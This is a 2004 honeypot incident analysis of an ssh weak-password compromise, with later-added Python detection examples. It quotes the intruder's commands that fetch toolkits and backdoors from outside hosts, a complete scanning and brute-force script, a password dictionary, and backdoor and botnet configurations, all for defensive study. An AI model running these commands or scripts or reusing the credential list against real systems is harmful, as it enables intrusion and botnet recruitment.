Article author: Steven Sim Kok Leong
Honeynet analysis for 02 Nov 2004
Analyzer on duty: Steven Sim Kok Leong (steven at security.org.sg)
We have ourselves a compromised honeypot on which a weak test account was exploited over ssh! This is great! An analysis of this compromise follows.
NOTE: Further details were snipped due to sensitivity concerns. If you need them, please email me.
Based on the actions taken by the intruder, I would conclude that this intruder is a script kiddie, because he never bothered to cover any of his tracks by replacing system binaries with trojaned ones or cleansing log files such as the command history.
The analysis below shows that intruders often rely on the same vulnerability and exploits they used to attack the launchpad/zombie to attack other systems from the launchpad/zombie itself. More often than not, the system that compromised you is itself a compromised system. The ultimate motive (e.g. perhaps DDoS) for these zombied systems, beyond joining botnets and being used as launchpads to attack other systems on the Internet, is not yet known, because at this point not much IRC conversation has been noticed despite some IRC nick changes and chat messages (which are also reflected in the snort alerts). Further monitoring of these channels by subsequent days' duty analyzers may shed more light.
Regardless, in view of the considerable number of systems compromised due to weak passwords, system administrators are reminded to enforce strong passwords. Please refer to the list of recommendations and actions in one of our earlier advisories for system administrators [1]. In addition to these recommendations, from the network perspective, network administrators are encouraged to take one or more of the following actions:
Block the ports listed below, TCP/6667, TCP/7000 and TCP/8888, which are used by the IRC botnet servers, if possible (i.e. if not in use by valid services).
Block the IRC botnet servers listed below.
Block the attacker IP addresses listed below (not very effective, as most are dynamic IPs and/or compromised systems, i.e. no malicious intent on the part of the administrators of these systems).
Restrict outgoing IRC traffic to a list of trusted IRC servers if possible (principle of least privilege).
Monitor outgoing TCP/6667, TCP/7000 and TCP/8888 traffic at your border gateway.
Monitor both incoming and outgoing TCP/22 traffic at your border gateway.
--------------------------------------------------------------------------------
In view of the pretty persistent ssh dictionary password attacks [1] that have been targeting our honeynet for quite some time, a test account with the password "test" was created on 01 Nov 2004 at 1653 hrs, for the purpose of having the honeypot compromised so that hacker behavior and tactics could be observed and analyzed.
Within less than 3 hours, at 1944 hrs, a successful ssh dictionary attack on the test account took place remotely from X.X.X.X (South Korea). However, the session was immediately terminated without any commands being executed. From this, we inferred that it is likely a script simply scouring the Internet for accessible ssh accounts with weak passwords and collating the results for the intruder who launched the script to act upon.
On 02 Nov 2004, another successful ssh dictionary attack on the test account took place remotely at 2314 hrs from Y.Y.Y.Y (China). Again, as on 01 Nov, the session was terminated immediately once the SSH session was established.
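Added example, not from the original report: a Python detector over constructed sshd syslog lines that flags the two patterns described above, a burst of failed passwords from one source and an accepted login that is closed within seconds (the scanner's collect-results-and-leave behaviour), while leaving an interactive session of several minutes unflagged. The hostname, IPs, timestamps and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd syslog lines in OpenSSH 3.x wording (not from the report):
# 192.0.2.10 plays the scanning host, 192.0.2.20 the later hands-on intruder.
SAMPLE_LOG = """\
Nov  1 19:43:50 honeypot sshd[2201]: Failed password for illegal user admin from 192.0.2.10 port 4101 ssh2
Nov  1 19:43:52 honeypot sshd[2203]: Failed password for illegal user guest from 192.0.2.10 port 4102 ssh2
Nov  1 19:43:55 honeypot sshd[2205]: Failed password for root from 192.0.2.10 port 4103 ssh2
Nov  1 19:43:57 honeypot sshd[2207]: Failed password for illegal user user from 192.0.2.10 port 4104 ssh2
Nov  1 19:44:00 honeypot sshd[2209]: Failed password for test from 192.0.2.10 port 4105 ssh2
Nov  1 19:44:03 honeypot sshd[2211]: Accepted password for test from 192.0.2.10 port 4106 ssh2
Nov  1 19:44:04 honeypot sshd[2211]: Received disconnect from 192.0.2.10: 11: Bye Bye
Nov  2 23:21:10 honeypot sshd[3102]: Accepted password for test from 192.0.2.20 port 38381 ssh2
Nov  2 23:33:40 honeypot sshd[3102]: Received disconnect from 192.0.2.20: 11: Bye Bye
"""

LINE_RE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (.*)$")
AUTH_RE = re.compile(r"(Failed|Accepted) password for (?:illegal user )?(\S+) from (\S+) port")
DISC_RE = re.compile(r"Received disconnect from ([^:]+):")

def parse(log_text, year=2004):
    """Return (timestamp, kind, user, source_ip) tuples; syslog has no year, so one is supplied."""
    events = []
    for m in filter(None, map(LINE_RE.match, log_text.splitlines())):
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        auth, disc = AUTH_RE.search(m.group(2)), DISC_RE.search(m.group(2))
        if auth:
            events.append((ts, auth.group(1).lower(), auth.group(2), auth.group(3)))
        elif disc:
            events.append((ts, "disconnect", None, disc.group(1)))
    return events

def analyse(events, fail_threshold=5, window_s=600, leave_s=10):
    """Map source IP -> findings: password-guessing bursts and accept-then-leave probes."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[3]].append(ev)
    findings = defaultdict(list)
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e[0])
        fails = [e for e in evs if e[1] == "failed"]
        # Burst: fail_threshold failures from one source within window_s seconds.
        for i in range(len(fails) - fail_threshold + 1):
            if (fails[i + fail_threshold - 1][0] - fails[i][0]).total_seconds() <= window_s:
                users = sorted({e[2] for e in fails})
                findings[ip].append(f"dictionary attack: {len(fails)} failures against {users}")
                break
        # Probe: an accepted login closed within leave_s seconds did no interactive work.
        for k, ev in enumerate(evs):
            if ev[1] != "accepted":
                continue
            disc = next((x for x in evs[k + 1:] if x[1] == "disconnect"), None)
            if disc is not None and (disc[0] - ev[0]).total_seconds() <= leave_s:
                gap = int((disc[0] - ev[0]).total_seconds())
                findings[ip].append(f"probe-and-leave: '{ev[2]}' accepted, closed after {gap}s")
    return dict(findings)
```

The 12-minute session from 192.0.2.20 produces no finding, which mirrors the difference between the scanning script and the manual intruder described in this report.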
--------------------------------------------------------------------------------
7 mins later, at 2321 hrs on the same day, an intruder (acting either on the 01 Nov 1944 hrs or the 02 Nov 2314 hrs results) started dropping his goods through the test account backdoor from Z.Z.Z.Z (South Korea). You will notice further on in this analysis report that Z.Z.Z.Z is itself a compromised system that joined the IRC botnet (refer to the list of compromised systems detected in the botnet).
He launched the following commands. The typos are indicative of a manual attack, unlike the earlier ssh dictionary attacks. In fact, the intruder specifically had problems typing "e", i.e. either missing an "e" or typing "w" in its place, and also occasionally missed "p"s and "t"s.
Command sequence | Explanation
w | Checking whether I am online..;-)
cd /tmp | Change directory to /tmp
w | Got worried. Checking whether I am online, again
ls | Perform a listing of the /tmp directory
wget A.A.A.A/cel.tgz | Download cel.tgz
tar zxvf cel.tgz | Unzip cel.tgz
rm -rf cel.tgz | Remove cel.tgz
cd ssh | Change directory to the ssh directory retrieved from cel.tgz
ls | Perform a directory listing
ls | Perform a directory listing again, perhaps couldn't believe what he saw?
./assh X | Launch ssh dictionary attack at the X.0.0.0/8 class A network. The portscan alerts by snort in the summary are a result of this.
w | Got worried again. Checking again whether I am online.
passwd | Changing password to protect his turf
wget http://B.B.B.B:793/~zorg/local.tar.gz | Download local exploit archive local.tar.gz, deposited on polarhome on Aug 11 22:31
wget C.C.C.C/ccccccc/local.tar.gz | Download another local exploit archive local.tar.gz, similar in size to the one downloaded from B.B.B.B except for the timestamp. This one was deposited on Oct 6 22:11 at the geocities site.
wget D.D.D.D/psybnc.jpg | Attempt to download a bnc irc backdoor archive. Unfortunately the file is not accessible over the web.
wget E.E.E.E/psybnc.jg | Attempt failed because of a typo. E.E.E.E/psybnc.jpg does exist.
ftp | Intruder resorted to ftp'ing from D.D.D.D to download psybnc.jpg instead. Refer to more details below.
passed | Attempt to change the account password to protect his new turf, failed because of a typo.
passwd | Another attempt, but failed because of a typo in the password
passwd | Perhaps he was typing slower now, so the password change was successful.
tar zxvf psybnc.jpg | Untarring the bnc irc client archive that masqueraded with a jpg extension to hide its harmful intentions.
rm -rf psybnc.jpg | Removing the bnc irc backdoor archive
cd xsf | Change directory to the xsf directory retrieved from psybnc.jpg
mv crond sh" "-i | Rename the malicious bnc irc backdoor program called crond to a file literally named "sh -i" (with an embedded space), so that it appears as an interactive shell in the ps process listing and is not detected
export PATH="." | Set the path so that the malicious binary can find assisting files in the same directory.
sh" "-i | Launch the backdoor
exit | Not sure why he has to type exit so many times
exi | Typo again
texit | Typo again. Not a very good typist or lousy keyboard.
exit | Yet another try
exit | Yet another time, when he finally exited.
This logon session took 12 mins.
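Added example, not from the original report: a Python check for the `sh" "-i` trick above that compares each process's argv[0] with the target of /proc/<pid>/exe and flags binaries whose file name contains whitespace, that run from /tmp or similar scratch directories, or whose argv[0] does not match the real executable name. scan_proc() walks a live Linux /proc; check_process() is a pure function so it can be exercised on constructed data. Directory names and the sample argv/exe pairs are assumptions.

```python
import os

# Directories from which no legitimate long-running service binary should execute.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

def check_process(argv0, exe):
    """Reasons why a process looks masqueraded, given argv[0] and the resolved exe path.

    argv0 is the first NUL-separated field of /proc/<pid>/cmdline and exe the
    target of /proc/<pid>/exe. Returns [] for an ordinary process.
    """
    reasons = []
    exe_dir, exe_name = os.path.split(exe)
    for scratch in SCRATCH_DIRS:
        if (exe_dir + "/").startswith(scratch):
            reasons.append("executable lives under " + scratch.rstrip("/"))
            break
    if any(ch.isspace() for ch in exe_name):
        # 'mv crond sh" "-i' creates a file literally named "sh -i", so ps shows
        # what looks like an interactive shell.
        reasons.append("executable name contains whitespace")
    # Login shells report argv[0] as "-bash"; strip the marker before comparing.
    argv_name = os.path.basename(argv0.split(" ")[0]).lstrip("-") if argv0 else ""
    real_name = exe_name.split(" ")[0]
    # startswith tolerates version-suffixed interpreters (python3 -> python3.11);
    # symlinked shells (sh -> dash) still show up here and need a local allowlist.
    if argv_name and not real_name.startswith(argv_name):
        reasons.append(f"argv[0] {argv_name!r} does not match executable {real_name!r}")
    return reasons

def scan_proc(proc="/proc"):
    """Walk a live Linux /proc and return {pid: reasons} for suspicious processes."""
    hits = {}
    try:
        pids = [p for p in os.listdir(proc) if p.isdigit()]
    except OSError:
        return hits  # no procfs here (non-Linux or restricted sandbox)
    for pid in pids:
        try:
            exe = os.readlink(f"{proc}/{pid}/exe")
            with open(f"{proc}/{pid}/cmdline", "rb") as fh:
                argv0 = fh.read().split(b"\0")[0].decode(errors="replace")
        except OSError:
            continue  # kernel thread, process already gone, or not readable by us
        reasons = check_process(argv0, exe)
        if reasons:
            hits[pid] = reasons
    return hits

if __name__ == "__main__":
    for pid, why in scan_proc().items():
        print(pid, "; ".join(why))
```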
--------------------------------------------------------------------------------
First, let's take a deeper look into cel.tgz, which was downloaded, and the ./assh tool.
Listing of cel.tgz:
drwx------ httpd/root 0 2004-10-11 02:09:43 ssh/
-rwx------ httpd/root 453972 2004-07-13 02:09:58 ssh/ss
-rwxr-xr-x httpd/root 842424 2004-09-06 18:20:58 ssh/sshf
-rwx------ httpd/root 85 2004-07-13 02:10:33 ssh/go.sh
-rwx------ httpd/root 21407 2004-07-22 05:58:57 ssh/pscan2
-rwx------ httpd/root 206 2004-07-22 08:52:59 ssh/auto
-rwx------ httpd/root 605 2004-09-06 23:11:00 ssh/assh
-rwx------ httpd/root 4225 2004-07-22 08:35:14 ssh/129
-rw------- httpd/root 0 2004-07-23 08:28:03 ssh/129.98.pscan.22
Listing of ./assh script:
#!/bin/bash
# Expects exactly one argument: the first octet ("b class") of the /8 network to scan
if [ $# != 1 ]; then
    echo " usage: $0 <b class>"
    exit;
fi
echo " Versiune de scaner privata!"           # Romanian: "Private scanner version!"
echo "----------------------------------------------------"
echo " All my love for Liz! "
echo "----------------------------------------------------"
echo "# incep scanarea ..."                   # Romanian: "starting the scan ..."
./pscan2 $1 22                                # scan $1.0.0.0/8 for hosts listening on TCP/22
sleep 10
cat $1.pscan.22 |sort |uniq > uniq.txt        # pscan2 writes hits to $1.pscan.22; deduplicate them
oopsnr2=`grep -c . uniq.txt`                  # count non-empty lines, i.e. ssh servers found
echo "# Am gasit $oopsnr2 de servere"         # Romanian: "Found $oopsnr2 servers"
echo "----------------------------------------"
echo "# Incepem..."                           # Romanian: "Let's begin..."
./sshf 50                                     # run the dictionary attack (sshf) against the hosts found; the argument 50 is not documented here
rm -rf $1.pscan.22 uniq.txt                   # remove the scan output
echo "Asta a fost tot"                        # Romanian: "That was all"
Taking a closer look at pscan2, here is its usage syntax; the script uses it to scan for servers running the SSHD service on TCP port 22.
Usage: %s <b-block> <port> [c-block]
Looking at ./sshf, which the script launches, it contains a dictionary of userids and passwords used in the ssh dictionary attack. It uses openssl 0.9.7d libraries.
Here is the list of userids and passwords used:
nobody
patrick
qwerty
compas
sniper
12345678
123456789
1234567890
rolo66
rolo
iceuser
horde
cyrus
wwwrun
matt
teste
test
test2
test23
test123
www-data
mysql
operator
apache
switch
c43vr013T
1gcec19v8yz153072
jane
pamela
shadow
eegch11
r00t
abcd1234
ctxmonitor
cosmin
%username%
%null%
00000000
111111
1234qwer
1p2o3i
@#$%^&
apollo
passwor
passion
passwd
redhat
people
qwaszx
qwert
tester
zxcvbnm
zxcvb
zorro
e4K1mo0$
f4r6k2g7t9q3
w5n8o7t9i6x3
o6v9z3d8y7m9
k1u7r1t2r1t8
w5u6s9v7k5t4
linux
stones
yellow
cooling
b604092
bash
cmcnew
kH9dzv
toor
actros
cip52
pharma
cip51
spyder
bk123qwe
Lex1c0n3
1q2w3e
webmaster
user01
user1
user02
oracle
sybase
account
backup
adam
alan
frank
george
henry
john
love
hate
iloveyou
present
--------------------------------------------------------------------------------
While the tools in local.tar.gz were never used, the archive contains the following README:
all around local exploits..
4 linux , sunos , freebsd..
all public , no one private..
-
have phun
Zorg of texter
rohackingggggggggggggggg..:=)
Directory listing:
-rwxr-xr-x 1 5775 users 463529 Feb 23 2004 brk
-rwxr-xr-x 1 5775 users 452101 May 4 2004 brk2
-rwxr-xr-x 1 5775 users 4817 Jun 15 07:03 bsdsh
-rwxr-xr-x 1 5775 users 16154 Jul 31 07:06 dexter
-rwxr-xr-x 1 5775 users 17472 Jul 31 07:08 doptikbd
-rwxr-xr-x 1 5775 users 20216 Jul 31 07:13 f3
-rwxr-xr-x 1 5775 users 14860 Jul 31 06:41 kmod
-rwxr-xr-x 1 5775 users 19517 Jul 31 06:41 kmod2
-rwxr-xr-x 1 5775 users 445808 Aug 11 22:23 loginx
-rwxr-xr-x 1 5775 users 3078 Jun 20 2001 man-rh7.sh
-rwxr-xr-x 1 5775 users 1327 Jun 20 2001 modutils.sh
-rwxr-xr-x 1 5775 users 19414 Jul 31 06:29 mremap2
-rwxr-xr-x 1 5775 users 425887 Jul 31 06:30 mremap_pte
-rwxr-xr-x 1 5775 users 1729 May 5 2001 prlnx.sh
-rwxr-xr-x 1 5775 users 19910 Mar 20 2003 pt
-rwxr-xr-x 1 5775 users 19242 Jul 31 07:08 r0nin
-rw-r--r-- 1 5775 users 147 Aug 11 22:23 README
-rwxr-xr-x 1 5775 users 17318 Jul 31 07:08 rsybd
-rwxr-xr-x 1 5775 users 2311 May 5 2001 smlnx.sh
-rwxr-xr-x 1 5775 users 1759 Jul 31 06:52 stringetz
-rwxr-xr-x 1 5775 users 468689 Jul 31 06:30 w00t
-rwxr-xr-x 1 5775 users 4625 May 5 2001 xperl.sh
--------------------------------------------------------------------------------
Looking at the psybnc tool used:
psybnc.conf, residing in the xsf directory, shows that TCP port 65500 is used as the system (listening) port.
PSYBNC.SYSTEM.PORT1=65500
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
--------------------------------------------------------------------------------
Let us check out the FTP session that was initiated.
Sebek was not yet installed on this honeypot. Thus, what goes on behind the ftp command is derived from the honeywall pcap trace. After all, ftp is clear-text. Here are some snapshots of the hexadecimal and ascii traces.
Intruder logged in using the userid abc (masked):
07:30:58.280013 X.X.X.X.38381 > D.D.D.D.ftp: P 1:16(15) ack 24 win 5840 (DF) [tos 0x10]
0x0000 4510 0037 da54 4000 4006 b4b9 XXXX XXXX E..7.T@.@...XXXX
0x0010 DDDD DDDD 95ed 0015 62aa a912 fdb1 c69c DDDD....b.......
0x0020 5018 16d0 8154 0000 5553 4552 20aa bbcc P....T.. USER.abc
Intruder logged in using the password xyz (masked)
07:31:01.572491 X.X.X.X.38381 > D.D.D.D.ftp: P 16:30(14) ack 61 win 5840 (DF) [tos 0x10]
0x0000 4510 0036 da56 4000 4006 b4b8 XXXX XXXX E..6.V@.@...XXXX
0x0010 DDDD DDDD 95ed 0015 62aa a921 fdb1 c6c1 DDDD....b..!....
0x0020 5018 16d0 67bf 0000 5041 5353 20xx yyzz P...g...PASS.xyz
Intruder downloaded psybnc.jpg
07:31:36.760693 D.D.D.D.ftp > X.X.X.X.38381: P 310:381(71) ack 90 win 5840 (DF)
0x0000 4500 006f a55a 4000 3106 f88b DDDD DDDD E..o.Z@.1...DDDD
0x0010 XXXX XXXX 0015 95ed fdb1 c7ba 62aa a96b XXXX........b..k
0x0020 5018 16d0 f43b 0000 3135 3020 4f70 656e P....;..150.Open
0x0030 696e 6720 4249 4e41 5259 206d 6f64 6520 ing.BINARY.mode.
0x0040 6461 7461 2063 6f6e 6e65 6374 696f 6e20 data.connection.
0x0050 666f 7220 7073 7962 6e63 2e6a 7067 2028 for.psybnc.jpg.(
0x0060 3539 3637 3330 2062 7974 6573 290d 0a 596730.bytes)..
Using the same ftp userid and password, all the exploits in the repository can be retrieved for research.
# ftp D.D.D.D
Connected to D.D.D.D (D.D.D.D).
220 D.D Members FTP
Name (D.D.D.D:root): abc
331 Password required for abc.
Password:
230 User abc logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (D,D,D,D,102,150).
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 free web 37558 Oct 15 14:00 big.jpg
-rw-r--r-- 1 free web 377371 Aug 29 19:32 bk.tar.gz
-rw-r--r-- 1 free web 13342 Oct 18 17:58 brutessh2.tgz
-rw-r--r-- 1 free web 787019 Oct 13 17:24 dcstealth.zip
-rw-r--r-- 1 free web 720324 Sep 26 07:59 emech-madalin.tar.gz
-rw-r--r-- 1 free web 720348 Sep 21 18:56 emech.tar.gz
-rw-r--r-- 1 free web 720336 Sep 26 16:58 emechm.tar.gz
-rw-r--r-- 1 free web 173960 Sep 14 14:15 flood.tgz
-rw-r--r-- 1 free web 391294 Sep 24 11:19 massSSH.tgz
-rw-r--r-- 1 free web 717959 Sep 2 20:16 mech.tar.gz
-rw-r--r-- 1 free web 9052 Sep 16 18:09 miro.tgz
-rw-r--r-- 1 free web 80679 Oct 2 12:19 muie.mp3
-rw-r--r-- 1 free web 596730 Aug 30 05:51 psybnc.jpg
-rw-r--r-- 1 free web 895785 Sep 2 07:26 scan.tar
-rw-r--r-- 1 free web 26510 Sep 1 12:09 x.tar.gz
-rw-r--r-- 1 free web 10141 Sep 2 07:26 za.tgz
--------------------------------------------------------------------------------
After logging out, the intruder immediately logged in again at 2333 hrs from Z.Z.Z.Z.
The reason being that his psybnc irc system control backdoor at TCP port 65500 was not working. Thus, he typed the following commands to work around this handicap. He was probably too lazy to probe the ports opened to the Internet at the border firewall.
Command sequence | Explanation
cd /tmp | Change directory to /tmp
sbin/iptables -I INPUT -p tcp --dport 65500 -j ACCEPT | Attempt to update iptables to allow access to port 65500, failed because he missed out the / at the front
/sbin/iptables -I INPUT -p tcp --dport 65500 -j ACCEPT | Second attempt to update iptables to allow access to port 65500, failed simply because he isn't root with superuser privileges.
wget E.E.E.E/emech.tar.gz | Next, he downloads the emech irc backdoor archive from E.E.E.E. He probably chose another irc backdoor client because he thought the problem lay with his earlier psybnc irc backdoor toolkit. Instead of attempting any of the local privilege escalation exploits provided by local.tar.gz, which he downloaded in his earlier session, he downloaded emech.tar.gz, which is another irc backdoor toolkit.
tar zxvf emech.tar.gz | Untarring the emech.tar.gz irc backdoor archive
rm -rf mech.tar.gz | He failed to remove the archive because of a typo, i.e. he missed the "e" in front.
cd mech | Change directory to the mech directory extracted from emech.tar.gz
./mech | Launch the mech backdoor
exit | This time a single exit was successful.
This logon session took 11 mins.
--------------------------------------------------------------------------------
Checking out emech.
The IRC configuration file of emech, i.e. mech.session, has this:
hasonotice
nick Free`Bnc
login woot
ircname Who am I ?
modes ix
cmdchar
userfile emech.users3
set BANMODES 2
set OPMODES 2
set CTIMEOUT 90
set CDELAY 30
tog SPY 1
channel #[snipped]dea
channel #[snipped]eam
channel #[snipped]rum
channel #[snipped]gia
set MDL 3
set MBL 3
set MKL 3
set FL 3
set MAL 2
tog RK 1
tog PROT 1
tog KS 1
set AVOICE 1
nick PutMeUp
login hack
ircname Powerd By Romanian Hackers
modes ix
cmdchar
userfile emech.users2
set BANMODES 2
set OPMODES 2
set CTIMEOUT 90
set CDELAY 30
tog SPY 1
channel #[snipped]dea
channel #[snipped]eam
channel #[snipped]rum
channel #[snipped]gia
set MDL 3
set MBL 3
set MKL 3
set FL 3
set MAL 2
tog RK 1
tog PROT 1
tog KS 1
set AVOICE 1
nick Ascultat
login root
ircname 0,1Protected by National #[snipped]rum Team !!!
modes ix
cmdchar
userfile emech.users1
set BANMODES 2
set OPMODES 2
set CTIMEOUT 90
set CDELAY 30
tog SPY 1
channel #[snipped]rum
channel #[snipped]gia
set MDL 3
set MBL 3
set MKL 3
set FL 3
set MAL 2
tog RK 1
tog PROT 1
tog KS 1
set AVOICE 1
nick FavoritX
login cool
ircname Missing You Baby...
modes ix
cmdchar
userfile emech.users
set BANMODES 2
set OPMODES 2
set CTIMEOUT 90
set CDELAY 30
tog SPY 1
channel #[snipped]rum
channel #[snipped]gia
set MDL 3
set MBL 3
set MKL 3
set FL 3
set MAL 2
tog RK 1
tog PROT 1
tog KS 1
set AVOICE 1
[Post-sorted for ease of identification]
[Servers using TCP/6667]
server F.F.F.2 6667
server G.G.G.133 6667
server H.H.H.H 6667
server I.I.I.150 6667
server J.J.J.246 6667
server K.K.K.100 6667
server L.L.L.33 6667
[Servers using TCP/7000]
server M.M.M.248 7000
[Servers using TCP/8888]
server N.N.N.2 8888
From the configuration file, we can identify all the IRC servers used for the botnet as well as the IRC backdoor accounts that have joined the large botnet. Use of the above IRC servers is further proven by the pcap traces.
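As an added example (not part of the original report or of the emech tool), here is a Python parser for the mech.session layout shown above. It extracts each bot identity (every `nick` line opens a new block), groups the `server` lines by port as in the post-sorted listing, flattens them into a border deny list, and derives the ~login ident prefixes to search for in IRC traces. The session text, channel names and addresses are constructed stand-ins for the masked values.

```python
from collections import defaultdict

# Constructed mech.session fragment laid out like the one in the report: two bot
# identities followed by the shared server list. Hosts are documentation
# addresses standing in for the masked F.F.F.2-style entries.
SAMPLE_SESSION = """\
nick Free`Bnc
login woot
ircname Who am I ?
modes ix
cmdchar
userfile emech.users3
set CTIMEOUT 90
channel #chan-a
channel #chan-b
nick PutMeUp
login hack
ircname Powerd By Romanian Hackers
modes ix
cmdchar
userfile emech.users2
channel #chan-b
channel #chan-c
server 192.0.2.2 6667
server 198.51.100.133 6667
server 192.0.2.248 7000
server 203.0.113.2 8888
"""

def parse_session(text):
    """Return (bots, servers): bot dicts in file order and {port: sorted hosts}."""
    bots, servers, bot = [], defaultdict(set), None
    for raw in text.splitlines():
        parts = raw.strip().split(None, 1)
        if not parts:
            continue
        key, val = parts[0], parts[1] if len(parts) > 1 else ""
        if key == "nick":            # every 'nick' line opens a new bot block
            bot = {"nick": val, "login": "", "ircname": "", "userfile": "", "channels": []}
            bots.append(bot)
        elif key == "server":        # 'server host port', shared by all bots
            host, port = val.split()
            servers[int(port)].add(host)
        elif bot is None:
            continue                 # directive before the first nick: nothing to attach it to
        elif key == "channel":
            bot["channels"].append(val)
        elif key in ("login", "ircname", "userfile"):
            bot[key] = val
    return bots, {port: sorted(hosts) for port, hosts in servers.items()}

def egress_blocklist(servers):
    """(host, port) pairs for a border firewall deny list or an outbound-IRC monitor."""
    return sorted((host, port) for port, hosts in servers.items() for host in hosts)

def irc_idents(bots):
    """The ~login prefixes these bots show in IRC without identd, e.g. ~woot@host."""
    return sorted({"~" + bot["login"] for bot in bots if bot["login"]})
```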
These are some of the IRC backdoor accounts that have joined the large botnet. The IP addresses are those of the compromised IRC botnet zombies.
[Details have been snipped due to sensitivity reasons]
Multiple different entries of: ~cool@[snipped]
~hack@[snipped]
~root@[snipped]
~woot@[snipped]
[Other entries snipped]
What caught my attention most is ~woot@Z.Z.Z.Z (This is the system that compromised our honeypot!)
The IRC channels used and verified in pcap traces are:
channel #[snipped]rum
channel #[snipped]eam
channel #[snipped]dea
channel #[snipped]gia
Here are a couple of the pcap traces:
07:57:05.188294 F.F.F.2.ircd > X.X.X.X.38408: P 3217:4347(1130) ack 179 win 2896 (DF)
[Details snipped]
07:57:05.944658 F.F.F.2.ircd > X.X.X.X.38408: . 5435:6883(1448) ack 179 win 2896 (DF)
[Details snipped]
[Details snipped]
--------------------------------------------------------------------------------
Beyond the compromise, there is observably quite a fair bit of FTP scanning.
Taking just one of the hosts that scanned us, i.e. G.G.G.146, it looks like a harmless FTP probe to check for the availability of the service. Since the FTP service is not enabled on honeypot-rhl, perhaps our next activity should be to enable this service in order to capture and observe a successful compromise of it.
FTP scanning:
6 O.O.O.146
4 P.P.P.104
3 Q.Q.Q.202
2 R.R.R.57
2 S.S.S.130
--------------------------------------------------------------------------------
Conclusion
This is our first honeypot compromise and it has already proved to be most interesting. Further details (without compromising sensitivity) might be offered by other duty analyzers in the next few days. In the near future, the team will work on various configurations to track and understand blackhats.
--------------------------------------------------------------------------------
References:
[1] http://www.security.org.sg/gtec/ ... .php?diary=20040921
Count Intrusion attempt
107 Portscan detected from X.X.X.X Talker(fixed: 15 sliding: 15) Scanner(fixed: 0 sliding: 0)
106 Portscan detected from X.X.X.X Talker(fixed: 15 sliding: 30) Scanner(fixed: 0 sliding: 0)
80 Portscan detected from X.X.X.X Talker (fixed: 15 sliding: 29) Scanner(fixed: 0 sliding: 0)
80 Portscan detected from X.X.X.X Talker(fixed: 15 sliding: 14) Scanner(fixed: 0 sliding: 0)
79 Portscan detected from X.X.X.X Talker(fixed: 1 sliding: 30) Scanner(fixed: 0 sliding: 0)
33 ICMP Destination Unreachable Port Unreachable
31 BACKDOOR typot trojan traffic
24 CHAT IRC message
24 BAD-TRAFFIC loopback traffic
22 SHELLCODE x86 NOOP
12 SIG^2 GTEC-honeynet - Possible NACHI worm ICMP ECHO traffic
11 MS-SQL Worm propagation attempt
10 ICMP Echo Reply
7 ICMP PING
3 ICMP PING NMAP
3 CHAT IRC nick change
2 (spp_stream4) possible EVASIVE RST detection
1 WEB-MISC bad HTTP/1.1 request, Potentially worm attack
1 WEB-MISC WebDAV search access
1 WEB-IIS view source via translate header
1 SHELLCODE x86 setgid 0
1 ATTACK-RESPONSES 403 Forbidden
1 (http_inspect) OVERSIZE REQUEST-URI DIRECTORY
1 (http_inspect) BARE BYTE UNICODE ENCODING
Country sources of attacks
9 China (CN)
6 United States of America (US)
3 Singapore (SG)
2 South Korea (KR)
2 Japan (JP)
1 Turkey (TR)
1 Trinidad and Tobago (TT)
1 Netherlands (NL)
1 Latvia (LV)
1 Italy (IT)
1 Germany (DE)
1 Chile (CL)
1 Brazil (BR)
1 Austria (AT)
1 Australia (AU)